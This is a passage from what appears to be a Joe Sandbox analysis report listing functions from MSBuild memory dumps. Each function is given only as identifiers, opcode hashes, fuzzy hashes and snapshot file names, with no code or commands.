                                                                  • Opcode ID: c6c6ec1b43ce4318781436b673be11232b88b34ce70755ae679c94841bb03f5a
                                                                  • Instruction ID: 7e9bfc82ca3a948ddffab2467768bc83857c4a5e62edf6926ea5a7143c9502df
                                                                  • Opcode Fuzzy Hash: c6c6ec1b43ce4318781436b673be11232b88b34ce70755ae679c94841bb03f5a
                                                                  • Instruction Fuzzy Hash: DEF08C342883888FE302DFA4C8946207F65FB9A300F00407AD8858B396DA7C5801CF11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042328F0 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5abb62475ab9222c7d41d6645e53f895684554c667c5243a4d24df83838a05b9
                                                                  • Instruction ID: acc8633be14d0496a72d5f535bd90b6e10896ddf8fccf71358d36087b68b5da3
                                                                  • Opcode Fuzzy Hash: 5abb62475ab9222c7d41d6645e53f895684554c667c5243a4d24df83838a05b9
                                                                  • Instruction Fuzzy Hash: ADE08C363041006FC3108A0FEC88D46FBEDEFC8630B10802AFA0DC7320CA30AC01C6A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236493 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65e7be7f7146031fdf879e5ddaf41599f0a0bb618a44b32bcd329ae672398b6e
                                                                  • Instruction ID: a3b1b478a905281d30d8cd78636199aaeb5154736cad4dd4fa17932ac07853a2
                                                                  • Opcode Fuzzy Hash: 65e7be7f7146031fdf879e5ddaf41599f0a0bb618a44b32bcd329ae672398b6e
                                                                  • Instruction Fuzzy Hash: AEE086B1F0510AABDB21DE70D98579D77AD9B46214F2444E4D544D7202E176CB419380
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236498 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aff06f97b8ae29cbbafe7b777b9a0c3b9abbc76b52a7c3517cc9004b6f22fea2
                                                                  • Instruction ID: 329c765c412c8b65cf99824115fe6e25ecc8a42aa47c4c708c1642e5b8ca419c
                                                                  • Opcode Fuzzy Hash: aff06f97b8ae29cbbafe7b777b9a0c3b9abbc76b52a7c3517cc9004b6f22fea2
                                                                  • Instruction Fuzzy Hash: 86E0ECB1E0520AABDB20DAA4DE8574A76ADDB46214F2484E5DA08D7202E276DB819790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042304F0 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d97cc29a7c5286c1dc97c6de452fee058a259557f55118b20ad86799c73ded4d
                                                                  • Instruction ID: 7097dcad02898a0c2ccffef6d7fbf12151e049bd52fddbb12daed996ad0e56e3
                                                                  • Opcode Fuzzy Hash: d97cc29a7c5286c1dc97c6de452fee058a259557f55118b20ad86799c73ded4d
                                                                  • Instruction Fuzzy Hash: 91E026B93007818FCB32CF34E10016A3FF8BB06641304095ED0D6C3682DB24E609C755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230D38 Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: afcc8bdf635a8bfae26b05e24460bab7591d1f3fb9414d145d0cafe74c492b8f
                                                                  • Instruction ID: 15f034498fc730865018fb1fa4896f3ad58e5e974ab161d39b4dcba63f37e39a
                                                                  • Opcode Fuzzy Hash: afcc8bdf635a8bfae26b05e24460bab7591d1f3fb9414d145d0cafe74c492b8f
                                                                  • Instruction Fuzzy Hash: CDE01AB56187819FC3328F3994405A27FF0EF465103064D8EE4C1C7656C724F819C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230E60 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1850c42aa69435c0384181401b5bfab032cc5f5c9a683bf2cbdab7b6b52596b6
                                                                  • Instruction ID: 6585b5097b5346a7295dd7968895182218be2315663401c64904813a03a48ff5
                                                                  • Opcode Fuzzy Hash: 1850c42aa69435c0384181401b5bfab032cc5f5c9a683bf2cbdab7b6b52596b6
                                                                  • Instruction Fuzzy Hash: C4E01234380318AFE704EF95D899A21BB6AF7A9341F00803AE9458B388DABD6811CF11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04231992 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ab9ee302d5b13ff52d9b0a3e5aa7355fe424e6f356bcf5d21d2afe893b4db803
                                                                  • Instruction ID: 6004fda9941bc65eabe561a65d456f3d65c08b0feb1c3d7fec2ccd52a7622ae5
                                                                  • Opcode Fuzzy Hash: ab9ee302d5b13ff52d9b0a3e5aa7355fe424e6f356bcf5d21d2afe893b4db803
                                                                  • Instruction Fuzzy Hash: 02E01A7610024AEFCB06CF60C484C957FB2FF1531571489EAE5458F136CB31D565DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230500 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4584d6f13a1a92abdb372821fd6045895da42e9d021c38f4f2ee360c21d6606c
                                                                  • Instruction ID: 10042c566ce7246439acbb7c55de28aa56b58ac5480a70f46d342e18ba2d8b56
                                                                  • Opcode Fuzzy Hash: 4584d6f13a1a92abdb372821fd6045895da42e9d021c38f4f2ee360c21d6606c
                                                                  • Instruction Fuzzy Hash: 35D05E70710B208B4B34DF68A40085AB7FCBF09A613000A6EE45AC3600DB71F90887D6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042316C0 Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 10d66ba81ec16bd9dedf621ee1fdce5ac39f1163c2b27c420bad8a86bbd7f99b
                                                                  • Instruction ID: 8cc3cde5b627f059cb4892cce610f29bb4759a44801147810773260b565572e1
                                                                  • Opcode Fuzzy Hash: 10d66ba81ec16bd9dedf621ee1fdce5ac39f1163c2b27c420bad8a86bbd7f99b
                                                                  • Instruction Fuzzy Hash: 60D0A99A3182D529E60233A961213AE3F638B82A04F05049BC2C4C65D7C808C65203AE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 042316D0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43750db50c09473a54e89da7c45339ae2dd2320f325cabf33bfafe188a5efa5b
                                                                  • Instruction ID: 867e3884e00b1a3b3ea19ff7c6f41822865c54e09c3985ea9f0b3d2298220545
                                                                  • Opcode Fuzzy Hash: 43750db50c09473a54e89da7c45339ae2dd2320f325cabf33bfafe188a5efa5b
                                                                  • Instruction Fuzzy Hash: CFB09B2131453813E50431DD6410BAD769E4785E65F000067A60D877858DC55D4112FD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230253 Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c5c5b792e4ed566ebd7fc386aee5244e1c74c4fc25f0352e24bfc178bc3f9201
                                                                  • Instruction ID: 46618286160fc41d1136b0a5e9979633e6063c9b89174383345f23057e80f39b
                                                                  • Opcode Fuzzy Hash: c5c5b792e4ed566ebd7fc386aee5244e1c74c4fc25f0352e24bfc178bc3f9201
                                                                  • Instruction Fuzzy Hash: EAD092B0A6421ADFEF22CFC0C8187EEBB70BB04306F004519D011A6198CFB92946CF60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04230361 Relevance: .0, Instructions: 2COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c64536c3131f412638ac6d5e495c10834ceb89d30db4209ea82db0a1d2390ec
                                                                  • Instruction ID: d54e4664c4c4c1739929c32b328af34076158541101ee2ef9c71198126945118
                                                                  • Opcode Fuzzy Hash: 6c64536c3131f412638ac6d5e495c10834ceb89d30db4209ea82db0a1d2390ec
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 0118A796 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2588095660.0000000001130000.00000040.00000400.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1130000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bbf3182e8038861d9b844dbd392828f8c69fe8f7699e2fd374832bcc6d7ab63
                                                                  • Instruction ID: 481be04e87171c0f619b814b1566317095267bfdff623d7efa360e5b8e215204
                                                                  • Opcode Fuzzy Hash: 9bbf3182e8038861d9b844dbd392828f8c69fe8f7699e2fd374832bcc6d7ab63
                                                                  • Instruction Fuzzy Hash: A9B092353419419AD709CF08C2A5B85B3E2AF65EC0B8A8058984583925C3199944C900
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323DD78 Relevance: 5.4, Strings: 4, Instructions: 426COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ]$dMp$dMp$C{"
                                                                  • API String ID: 0-3277301763
                                                                  • Opcode ID: 59747937495bd18b3f0069a94a751fefa6a9e34540995ff5dbbb97f56ee284fa
                                                                  • Instruction ID: 914214d607977cd734176c2c3235d6e4773a795a0a6ac954c2ee00e70cc33e9e
                                                                  • Opcode Fuzzy Hash: 59747937495bd18b3f0069a94a751fefa6a9e34540995ff5dbbb97f56ee284fa
                                                                  • Instruction Fuzzy Hash: 13F14E71B002098FDB14DFA8C890B9EB7B6EF86700F248569E415EB395DB34DD86CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%